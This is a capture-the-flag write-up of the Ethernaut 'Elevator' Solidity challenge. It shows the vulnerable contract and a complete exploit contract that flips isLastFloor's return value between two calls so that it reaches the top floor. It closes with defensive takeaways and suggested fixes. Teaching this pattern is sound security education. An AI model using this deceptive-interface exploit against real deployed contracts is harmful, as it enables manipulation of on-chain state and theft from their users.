Ethernaut #11 Elevator

Ethernaut #11: Elevator – Refusing to Go Where Expected

Intro

Ethernaut's Elevator throws you into a building with a seemingly defiant elevator. Your task: force this elevator to take you to the top floor. However, the provided goTo() function has a peculiar requirement– it only works if the top variable is true when it's called. This leads us down a path of manipulating the contract's logic.

I will be honest, this was very confusing. I could see the interface and the goTo() function, but I needed more to go off of, to finish this challenge. The solution hinges on exploiting the Elevator contract's trust in the external Building interface. We create a malicious contract that pretends to implement this interface but manipulates the return value of the isLastFloor() function. Our contract initially returns false to allow the Elevator to move to the desired floor, then subsequently returns true to satisfy the goTo() function's check. This strategic deception tricks the Elevator into believing we're already at the top floor, accomplishing our goal.

The Challenge

The Elevator contract presents a deceptive interface:

interface Building {
  function isLastFloor(uint) external returns (bool);
}

contract Elevator {
  bool public top;
  uint public floor;

  function goTo(uint _floor) public {
    Building building = Building(msg.sender);

    if (! building.isLastFloor(_floor)) {
      floor = _floor;
      top = building.isLastFloor(floor);
    }
  }
}
        

The Vulnerability: Untrusted Interfaces

• Loose Interface: The goTo() function blindly trusts the Building interface. An adversarial contract implementing that interface can control what isLastFloor() returns.
• State Manipulation: The goTo() function calls isLastFloor() twice. This gives us an opportunity to trick it.

The Exploit

1. The Imposter Contract: We'll create a malicious contract that implements the Building interface. Here's the trick: the first time isLastFloor() is called, it returns false. The second time it returns true.
2. Calling the Elevator: We'll deploy our imposter contract, then call the Elevator's goTo() function and specify the top floor.
3. Fooling the System:Call #1 to isLastFloor(): Our imposter returns false, the Elevator moves us to the top floor.Call #2 to isLastFloor(): Our imposter now returns true, satisfying the goTo() function's requirement.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Setup interface for Building function to hack 
interface Building {
  function isLastFloor(uint) external returns (bool);
}

interface IElevator {
    function goTo(uint _floor) external;
}

contract HackBuilding is Building {
    bool public last = true;

    // Override function 
    function isLastFloor(uint _n) override external returns (bool) {
        last = !last;
        return last;
        
    }

    function goToTop(address _elevatorAddr) public {
        IElevator(_elevatorAddr).goTo(1); //call the instances function , so that it will use msg.sender and call this isLastFloor which returns true 
    }  
}        

My Takeaways

• Aha! Moment: When I realized the Elevator blindly trusts any contract claiming to be a Building, the exploit path became clear.
• Key Lesson: Never trust external contracts without careful consideration. Interfaces are good practice but don't guarantee the behavior of the implementing contract.
• Potential Fixes: Consider access controls on who can implement sensitive interfaces or validating the response of external calls

The Value of Ethernaut

Ethernaut challenges highlight the nuanced ways in which seemingly isolated smart contracts can be manipulated through their interactions.

Call to Action

Thinking like an adversary is key to developing robust smart contracts. Have you tackled Ethernaut Level 11?

Alternative Exploits?

I'm always interested in learning other approaches! Share yours in the comments!

Let me know if you'd like more detail on any aspect!